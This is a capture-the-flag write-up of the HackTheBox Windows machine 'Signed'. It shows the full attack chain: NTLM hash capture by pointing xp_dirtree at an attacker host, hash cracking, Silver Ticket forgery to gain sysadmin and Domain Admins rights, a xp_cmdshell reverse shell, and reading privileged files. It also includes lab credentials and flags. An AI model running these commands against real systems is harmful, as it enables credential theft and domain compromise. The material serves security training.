
HackTheBox - Signed

Signed exposes the MSSQL service; with access to it we capture the NTLM hash of a first user. With that user we discover a login for a group that holds the sysadmin role. We impersonate it through a Silver Ticket, which gives us initial access. After creating a new ticket that includes the Domain Admins group we manage to read files and, through 'execute as', list files; with this we obtain credentials from the administrator's history and finally run a reverse shell as that user.

Name: Signed
OS: Windows
Points: 30
Difficulty: Medium
Release date: 2025-10-11
IP: 10.10.11.90
Maker: kavigihan


Machine Information: Certified

The machine description emulates a “real” pentest scenario by providing credentials up front.

As is common in real life Windows penetration tests, you will start the Signed box with credentials for the following account which can be used to access the MSSQL service: scott / Sm230#C5NatH

Recon

nmap

nmap shows only the MSSQL port (1433).

# Nmap 7.95 scan initiated Sun Oct 12 21:12:07 2025 as: /usr/lib/nmap/nmap --privileged -p1433 -sV -sC -oN nmap_scan 10.10.11.90
Nmap scan report for 10.10.11.90
Host is up (0.088s latency).

PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info: 
|   10.10.11.90:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.90:1433: 
|     Target_Name: SIGNED
|     NetBIOS_Domain_Name: SIGNED
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: SIGNED.HTB
|     DNS_Computer_Name: DC01.SIGNED.HTB
|     DNS_Tree_Name: SIGNED.HTB
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-10-13T03:12:07+00:00; -13s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-12T11:18:04
|_Not valid after:  2055-10-12T11:18:04

Host script results:
|_clock-skew: mean: -13s, deviation: 0s, median: -13s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 12 21:12:20 2025 -- 1 IP address (1 host up) scanned in 12.65 seconds

We add signed.htb and dc01.signed.htb to our /etc/hosts file.

Service Access

The credentials give access over MSSQL.

❯ impacket-mssqlclient -dc-ip 10.10.11.89 -p 1433 scott:'Sm230#C5NatH'@signed.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (scott  guest@master)> select user_name();
        
-----   
guest   

SQL (scott  guest@master)> SELECT SYSTEM_USER
        
-----   
scott   

SQL (scott  guest@master)>

The user has limited permissions on the machine.

SQL (scott  guest@master)> xp_cmdshell whoami
ERROR(DC01): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (scott  guest@master)> enable_xp_cmdshell
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (scott  guest@master)> xp_dirtree C:/
subdirectory   depth   file   
------------   -----   ----   
SQL (scott  guest@master)>

Capture the Hash

However, we can point xp_dirtree at a UNC path on our own host to capture the user's hash.

SQL (scott  guest@master)> xp_dirtree \\10.10.14.2\sc\
subdirectory   depth   file   
------------   -----   ----   
SQL (scott  guest@master)>

After running Responder we see that the NTLMv2 hash of the mssqlsvc user was captured.

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::SIGNED:ffa3bb8b988148be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
[*] Skipping previously captured hash for SIGNED\mssqlsvc

Cracking the Hash

We run john with the rockyou.txt wordlist against the hash file.

❯ john SMB-NTLMv2-SSP-10.10.11.90.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 8 password hashes with 8 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
purPLE9795!@     (mssqlsvc)     
purPLE9795!@     (mssqlsvc)     
purPLE9795!@     (mssqlsvc)     
purPLE9795!@     (mssqlsvc)     
8g 0:00:00:08 DONE (2025-10-12 21:55) 0.9501g/s 532917p/s 4263Kc/s 4263KC/s purcitititya..puppuh
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

User - mssqlsvc

With the credentials we authenticate to the MSSQL service.

❯ impacket-mssqlclient -dc-ip 10.10.11.89 -p 1433 mssqlsvc:'purPLE9795!@'@signed.htb -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc  guest@master)> select user_name();
        
-----   
guest   

SQL (SIGNED\mssqlsvc  guest@master)> SELECT SYSTEM_USER
                  
---------------   
SIGNED\mssqlsvc   

SQL (SIGNED\mssqlsvc  guest@master)> 

With this user it is possible to list local files.

SQL (SIGNED\mssqlsvc  guest@master)> xp_dirtree c:/Users/mssqlsvc/Desktop
subdirectory   depth   file   
------------   -----   ----   
user.txt           1      1   

SQL (SIGNED\mssqlsvc  guest@master)>

enum_logins shows that the IT group has the sysadmin role.

SQL (SIGNED\mssqlsvc  guest@master)> enum_logins
name                                type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
---------------------------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa                                  SQL_LOGIN                 0          1               0             0            0              0           0           0           0   

##MS_PolicyEventProcessingLogin##   SQL_LOGIN                 1          0               0             0            0              0           0           0           0   

##MS_PolicyTsqlExecutionLogin##     SQL_LOGIN                 1          0               0             0            0              0           0           0           0   

SIGNED\IT                           WINDOWS_GROUP             0          1               0             0            0              0           0           0           0   

NT SERVICE\SQLWriter                WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT SERVICE\Winmgmt                  WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT SERVICE\MSSQLSERVER              WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT AUTHORITY\SYSTEM                 WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0   

NT SERVICE\SQLSERVERAGENT           WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT SERVICE\SQLTELEMETRY             WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0   

scott                               SQL_LOGIN                 0          0               0             0            0              0           0           0           0   

SIGNED\Domain Users                 WINDOWS_GROUP             0          0               0             0            0              0           0           0           0   

SQL (SIGNED\mssqlsvc  guest@master)>

Enumerating Domain Users/Groups

Through MSSQL we can enumerate domain accounts: by name, knowing the domain and the user or group name, or by 'fuzzing' the SID.

SQL (SIGNED\mssqlsvc  guest@master)> SELECT DEFAULT_DOMAIN()
         
------   
SIGNED   

SQL (SIGNED\mssqlsvc  guest@master)> SELECT SUSER_SID('SIGNED\Domain Admins')
                                                              
-----------------------------------------------------------   
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000'   

SQL (SIGNED\mssqlsvc  guest@master)> SELECT SUSER_SNAME(0x0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000)
                       
--------------------   
SIGNED\Domain Admins   

SQL (SIGNED\mssqlsvc  guest@master)>

To 'fuzz', we can enumerate users with the Metasploit module mssql_enum_domain_accounts.

msf > use auxiliary/admin/mssql/mssql_enum_domain_accounts
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > show options 

Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   FuzzNum              10000            yes       Number of principal_ids to fuzz.
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentication (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password purPLE9795!@
password => purPLE9795!@
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set username mssqlsvc
username => mssqlsvc
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set rhosts 10.10.11.90
rhosts => 10.10.11.90
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) >

The module found the domain SID along with 48 users and groups.

msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.10.11.90
[*] 10.10.11.90:1433 - Attempting to connect to the database server at 10.10.11.90:1433 as mssqlsvc...
[+] 10.10.11.90:1433 - Connected.
[*] 10.10.11.90:1433 - SQL Server Name: DC01
[*] 10.10.11.90:1433 - Domain Name: SIGNED
[+] 10.10.11.90:1433 - Found the domain sid: 0105000000000005150000005b7bb0f398aa2245ad4a1ca4
[*] 10.10.11.90:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.10.11.90:1433 -  - SIGNED\Administrator
[*] 10.10.11.90:1433 -  - SIGNED\Guest
[*] 10.10.11.90:1433 -  - SIGNED\krbtgt
[*] 10.10.11.90:1433 -  - SIGNED\Domain Admins
[*] 10.10.11.90:1433 -  - SIGNED\Domain Users
[*] 10.10.11.90:1433 -  - SIGNED\Domain Guests
[*] 10.10.11.90:1433 -  - SIGNED\Domain Computers
[*] 10.10.11.90:1433 -  - SIGNED\Domain Controllers
[*] 10.10.11.90:1433 -  - SIGNED\Cert Publishers
[*] 10.10.11.90:1433 -  - SIGNED\Schema Admins
[*] 10.10.11.90:1433 -  - SIGNED\Enterprise Admins
[*] 10.10.11.90:1433 -  - SIGNED\Group Policy Creator Owners
[*] 10.10.11.90:1433 -  - SIGNED\Read-only Domain Controllers
[*] 10.10.11.90:1433 -  - SIGNED\Cloneable Domain Controllers
[*] 10.10.11.90:1433 -  - SIGNED\Protected Users
[*] 10.10.11.90:1433 -  - SIGNED\Key Admins
[*] 10.10.11.90:1433 -  - SIGNED\Enterprise Key Admins
[*] 10.10.11.90:1433 -  - SIGNED\RAS and IAS Servers
[*] 10.10.11.90:1433 -  - SIGNED\Allowed RODC Password Replication Group
[*] 10.10.11.90:1433 -  - SIGNED\Denied RODC Password Replication Group
[*] 10.10.11.90:1433 -  - SIGNED\DC01$
[*] 10.10.11.90:1433 -  - SIGNED\DnsAdmins
[*] 10.10.11.90:1433 -  - SIGNED\DnsUpdateProxy
[*] 10.10.11.90:1433 -  - SIGNED\mssqlsvc
[*] 10.10.11.90:1433 -  - SIGNED\HR
[*] 10.10.11.90:1433 -  - SIGNED\IT
[*] 10.10.11.90:1433 -  - SIGNED\Finance
[*] 10.10.11.90:1433 -  - SIGNED\Developers
[*] 10.10.11.90:1433 -  - SIGNED\Support
[*] 10.10.11.90:1433 -  - SIGNED\oliver.mills
[*] 10.10.11.90:1433 -  - SIGNED\emma.clark
[*] 10.10.11.90:1433 -  - SIGNED\liam.wright
[*] 10.10.11.90:1433 -  - SIGNED\noah.adams
[*] 10.10.11.90:1433 -  - SIGNED\ava.morris
[*] 10.10.11.90:1433 -  - SIGNED\sophia.turner
[*] 10.10.11.90:1433 -  - SIGNED\james.morgan
[*] 10.10.11.90:1433 -  - SIGNED\mia.cooper
[*] 10.10.11.90:1433 -  - SIGNED\elijah.brooks
[*] 10.10.11.90:1433 -  - SIGNED\isabella.evans
[*] 10.10.11.90:1433 -  - SIGNED\lucas.murphy
[*] 10.10.11.90:1433 -  - SIGNED\william.johnson
[*] 10.10.11.90:1433 -  - SIGNED\charlotte.price
[*] 10.10.11.90:1433 -  - SIGNED\henry.bennett
[*] 10.10.11.90:1433 -  - SIGNED\amelia.kelly
[*] 10.10.11.90:1433 -  - SIGNED\jackson.gray
[*] 10.10.11.90:1433 -  - SIGNED\harper.diaz
[*] 10.10.11.90:1433 -  - SIGNED\SQLServer2005SQLBrowserUser$DC01
[+] 10.10.11.90:1433 - 48 user accounts, groups, and computer accounts were found.
[*] 10.10.11.90:1433 - Query results have been saved to: /home/kali/.msf4/loot/20251012231030_default_10.10.11.90_mssql.domain.acc_686396.txt
[*] Auxiliary module execution completed
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) >

A wordlist was created with the users and groups.

❯ cat /home/kali/.msf4/loot/20251012231030_default_10.10.11.90_mssql.domain.acc_686396.txt | grep SIGNED | cut -d '\' -f2 | cut -d '"' -f1  > user_group.txt
❯ wc -l user_group.txt
47 user_group.txt
❯ head user_group.txt
Administrator
Allowed RODC Password Replication Group
Cert Publishers
Cloneable Domain Controllers
DC01$
Denied RODC Password Replication Group
Developers
DnsAdmins
DnsUpdateProxy
Domain Admins

A Python script helped us obtain the domain SID; the trailing -0 is removed.

❯ python sidtostr.py
S-1-5-21-4088429403-1159899800-2753317549-0

sysadmin via Silver Ticket

Silver Ticket

With the information we have we can generate a Silver Ticket using impacket's ticketer. First we generate the NT hash for the password.

❯ python -c 'import hashlib,binascii; print(binascii.hexlify(hashlib.new("md4", "purPLE9795!@".encode("utf-16le")).digest()))'
b'ef699384c3285c54128a3ee1ddb1a0cc'

With that we have everything needed to create the ticket:

  • Domain SID: S-1-5-21-4088429403-1159899800-2753317549
  • NTHASH: ef699384c3285c54128a3ee1ddb1a0cc
  • Domain: signed.htb
  • SPN: mssqlsvc/dc01.signed.htb
  • User

In this case we create the ticket for the user mssqlsvc. Kerberos authentication is requested with the ticket loaded through KRB5CCNAME, and it is accepted for authenticating to MSSQL.

❯ impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -dc-ip 10.10.11.90 -spn mssqlsvc/dc01.signed.htb mssqlsvc
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/mssqlsvc
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in mssqlsvc.ccache
KRB5CCNAME=mssqlsvc.ccache impacket-mssqlclient signed.htb/mssqlsvc@dc01.signed.htb -no-pass -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (SIGNED\Administrator  guest@master)>

Sysadmin

Through a Silver Ticket it is possible to impersonate a user or group. We obtain the RID of the IT group, since that group holds the sysadmin role.

# mssql 'shell'
SQL (SIGNED\mssqlsvc  guest@master)> SELECT SUSER_SID('SIGNED\IT')
                                                              
-----------------------------------------------------------   
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'   

SQL (SIGNED\mssqlsvc  guest@master)> 

# script
❯ python sidtostr.py 0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000
Converting 0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000
S-1-5-21-4088429403-1159899800-2753317549-1105
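The writeup's sidtostr.py is not shown, so here is an added example (my code, not the author's script) that does the same job for the two conversions used above: it decodes the binary SID returned by SUSER_SID() into S-1-5-21-... form, and it re-encodes a string SID into the 0x... literal that SUSER_SNAME() expects, which is the same SID-to-RID sweep that mssql_enum_domain_accounts performs. The values are the ones printed earlier on this page. The 24-byte "domain sid" that the Metasploit module reports is the full SID with its last sub-authority cut off while the count byte still says 5; the decoder accepts that prefix form, which is one reason a stricter script may show a trailing -0 that has to be removed by hand.

```python
import struct


def sid_bytes_to_str(raw: bytes) -> str:
    """Decode a binary SID (revision, sub-authority count, 48-bit authority, 32-bit LE subs)."""
    if len(raw) < 8 or (len(raw) - 8) % 4 != 0:
        raise ValueError("malformed SID: length %d" % len(raw))
    revision, declared = raw[0], raw[1]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    authority = int.from_bytes(raw[2:8], "big")
    present = (len(raw) - 8) // 4
    if present > declared:
        raise ValueError("more sub-authorities than declared")
    # present < declared happens for the truncated domain-SID prefix shown by
    # mssql_enum_domain_accounts; decode whatever sub-authorities are there.
    subs = struct.unpack("<%dI" % present, raw[8:])
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def sid_str_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' back to the binary layout SUSER_SNAME() accepts as 0x... literal."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a string SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)])
            + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def split_rid(sid: str):
    """Separate the domain SID from the trailing RID (the '-0' / '-512' / '-1105' part)."""
    base, _, rid = sid.rpartition("-")
    return base, int(rid)


def suser_sname_literals(domain_sid: str, first_rid: int, count: int):
    """Yield (rid, hex literal) pairs for SELECT SUSER_SNAME(0x...) over a RID range."""
    for rid in range(first_rid, first_rid + count):
        yield rid, "0x" + sid_str_to_bytes("%s-%d" % (domain_sid, rid)).hex()


if __name__ == "__main__":
    # Values from this page: Domain Admins (RID 512) and the IT group (RID 1105).
    for hexsid in ("0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000",
                   "0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000"):
        print(sid_bytes_to_str(bytes.fromhex(hexsid)))
    domain, _ = split_rid(sid_bytes_to_str(bytes.fromhex(
        "0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000")))
    for rid, literal in suser_sname_literals(domain, 500, 3):
        print(rid, literal)
```

From a monitoring standpoint, the name-to-SID lookups behind SUSER_SID()/SUSER_SNAME() are what turn a low-privileged SQL login into a domain directory oracle; the burst of sequential RID translations that the module produces (10000 in a row from one SQL session) is a recognisable pattern in SQL Server audit logs and in LSA lookup telemetry on the domain controller.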

After adding the group to the ticket, we verify the role and see that we can run commands with xp_cmdshell.

❯ impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -dc-ip 10.10.11.90 -group 1105 -spn mssqlsvc/dc01.signed.htb mssqlsvc
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/mssqlsvc
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in mssqlsvc.ccache
KRB5CCNAME=mssqlsvc.ccache impacket-mssqlclient dc01.signed.htb -no-pass -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (SIGNED\Administrator  dbo@master)> SELECT IS_SRVROLEMEMBER('sysadmin') as sysadmin_check;
sysadmin_check   
--------------   
             1   

SQL (SIGNED\Administrator  dbo@master)> xp_cmdshell whoami
output            
---------------   
signed\mssqlsvc   

NULL              

SQL (SIGNED\Administrator  dbo@master)>

The session shows as Administrator, but commands are actually executed as mssqlsvc.

SQL (SIGNED\Administrator  dbo@master)> SELECT SYSTEM_USER
                       
--------------------   
SIGNED\Administrator   

SQL (SIGNED\Administrator  dbo@master)> xp_cmdshell whoami
output            
---------------   
signed\mssqlsvc   

NULL              

SQL (SIGNED\Administrator  dbo@master)>

User - mssqlsvc

We generate a reverse shell on revshells and run it.

SQL (SIGNED\Administrator  dbo@master)> xp_cmdshell powershell -e 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

We obtain access as mssqlsvc and the user.txt flag.

❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.2] from signed.htb [10.10.11.90] 56647

PS C:\Windows\system32> whoami
signed\mssqlsvc
PS C:\Windows\system32> cd C:/users/mssqlsvc/desktop
PS C:\users\mssqlsvc\desktop> dir


    Directory: C:\users\mssqlsvc\desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---       10/12/2025   4:16 AM             34 user.txt                                                              


PS C:\users\mssqlsvc\desktop> cat user.txt
9fc66a4c0156dccf9f12eda841f5fdb6
PS C:\users\mssqlsvc\desktop>

Impersonate Administrator

If we specify the RIDs of the Domain Admins and IT groups, together with the RID of the mssqlsvc user, this lets us read files 'as administrator'. However, commands still run as mssqlsvc.

❯ impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -dc-ip 10.10.11.90 -groups 512,1105 -user-id 1103 -spn mssqlsvc/dc01.signed.htb Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
KRB5CCNAME=Administrator.ccache impacket-mssqlclient dc01.signed.htb -no-pass -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc  dbo@master)> SELECT SYSTEM_USER
                  
---------------   
SIGNED\mssqlsvc   

SQL (SIGNED\mssqlsvc  dbo@master)> SELECT * FROM OPENROWSET(BULK 'C:\Users\administrator\Desktop\root.txt', SINGLE_CLOB) AS c;
BulkColumn                                
---------------------------------------   
b'6e953c5b088e620c60433810bed4dbad\r\n'   

SQL (SIGNED\mssqlsvc  dbo@master)> xp_dirtree C:\Users\administrator\
subdirectory   depth   file   
------------   -----   ----   
SQL (SIGNED\mssqlsvc  dbo@master)> xp_cmdshell whoami
output            
---------------   
signed\mssqlsvc   

NULL              

SQL (SIGNED\mssqlsvc  dbo@master)>

EXECUTE AS

We use EXECUTE AS to impersonate the Administrator user, which lets us list files 'as administrator'. It is limited to only that, though.

SQL (SIGNED\mssqlsvc  dbo@master)> EXECUTE AS LOGIN = 'SIGNED\Administrator'
SQL (SIGNED\Administrator  guest@master)> xp_dirtree C:/Users/Administrator/
subdirectory       depth   file   
----------------   -----   ----   
3D Objects             1      0   

AppData                1      0   

Application Data       1      0   

Contacts               1      0   

Cookies                1      0   

Desktop                1      0   

# [... cut ...]

Templates              1      0   

Videos                 1      0   

SQL (SIGNED\Administrator  guest@master)> SELECT * FROM OPENROWSET(BULK 'C:\Users\administrator\Desktop\root.txt', SINGLE_CLOB) AS c;
ERROR(DC01): Line 1: You do not have permission to use the bulk load statement.
SQL (SIGNED\Administrator  guest@master)> 

Enumerating Files

For now we have two ways to list and read files as administrator: reading files through the Silver Ticket that specifies the Domain Admins group, and listing files through Silver Ticket + EXECUTE AS. Using both we can enumerate files on the machine.

In the administrator's Documents folder we find two PowerShell scripts.

# Silver Ticket + EXECUTE AS "shell"
SQL (SIGNED\Administrator  guest@master)> xp_dirtree c:/Users/Administrator/Documents
subdirectory   depth   file   
------------   -----   ----   
cleanup.ps1        1      1   

My Music           1      0   

My Pictures        1      0   

My Videos          1      0   

restart.ps1        1      1   

SQL (SIGNED\Administrator  guest@master)>

They appear to be maintenance scripts.

# Silver Ticket "shell"
SQL (SIGNED\mssqlsvc  dbo@master)> SELECT * FROM OPENROWSET(BULK 'c:\Users\Administrator\Documents\cleanup.ps1', SINGLE_CLOB) AS c;
BulkColumn                                                                                                                                                                                                                                                        
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   
b'# DNS cleanup\r\n$ZoneName = "signed.htb"\r\n\r\n# List of default DNS records to keep (from your provided list)\r\n$defaultRecords = @(\r\n    @{Host="@"; Type="A"},\r\n    @{Host="@"; Type="AAAA"},\r\n    @{Host="@"; Type="NS"},\r\n    @{Host="@"; Type="SOA"},\r\n    @{Host="_gc._tcp"; Type="SRV"},\r\n    @{Host="_gc._tcp.Default-First-Site-Name._sites"; Type="SRV"},\r\n    @{Host="_kerberos._tcp"; Type="SRV"},\r\n    @{Host="_kerberos._tcp.Default-First-Site-Name._sites"; Type="SRV"},\r\n    @{Host="_kerberos._udp"; Type="SRV"},\r\n    @{Host="_kpasswd._tcp"; Type="SRV"},\r\n    @{Host="_kpasswd._udp"; Type="SRV"},\r\n    @{Host="_ldap._tcp"; Type="SRV"},\r\n    @{Host="_ldap._tcp.Default-First-Site-Name._sites"; Type="SRV"},\r\n    @{Host="_msdcs"; Type="NS"},\r\n    @{Host="dc01"; Type="A"},\r\n    @{Host="dc01"; Type="AAAA"},\r\n    @{Host="DomainDnsZones"; Type="A"},\r\n    @{Host="DomainDnsZones"; Type="AAAA"},\r\n    @{Host="_ldap._tcp.DomainDnsZones"; Type="SRV"},\r\n    @{Host="_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones"; Type="SRV"},\r\n    @{Host="ForestDnsZones"; Type="A"},\r\n    @{Host="ForestDnsZones"; Type="AAAA"},\r\n    @{Host="_ldap._tcp.ForestDnsZones"; Type="SRV"},\r\n    @{Host="_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones"; Type="SRV"}\r\n)\r\n\r\n# Get all records in zone\r\n$allRecords = Get-DnsServerResourceRecord -ZoneName $ZoneName\r\n\r\nforeach ($record in $allRecords) {\r\n\r\n    # Check if record is in defaults\r\n    $keep = $defaultRecords | Where-Object { $_.Host -eq $record.HostName -and $_.Type -eq $record.RecordType }\r\n    if ($keep) { continue } # Skip default records\r\n\r\n    try {\r\n        switch ($record.RecordType) {\r\n            "A" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "A" -Name $record.HostName -RecordData $record.RecordData.IPv4Address -Force\r\n                Write-Host "Removed A record: $($record.HostName)"\r\n            }\r\n         
   "AAAA" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "AAAA" -Name $record.HostName -RecordData $record.RecordData.IPv6Address -Force\r\n                Write-Host "Removed AAAA record: $($record.HostName)"\r\n            }\r\n            "CNAME" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "CNAME" -Name $record.HostName -RecordData $record.RecordData.HostNameAlias -Force\r\n                Write-Host "Removed CNAME record: $($record.HostName)"\r\n            }\r\n            "MX" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "MX" -Name $record.HostName -RecordData $record.RecordData.MailExchange -Force\r\n                Write-Host "Removed MX record: $($record.HostName)"\r\n            }\r\n            "TXT" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "TXT" -Name $record.HostName -RecordData $record.RecordData.DescriptiveText -Force\r\n                Write-Host "Removed TXT record: $($record.HostName)"\r\n            }\r\n            "SRV" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "SRV" -Name $record.HostName -RecordData $record.RecordData -Force\r\n                Write-Host "Removed SRV record: $($record.HostName)"\r\n            }\r\n            default {\r\n                Write-Host "Skipping unsupported record type: 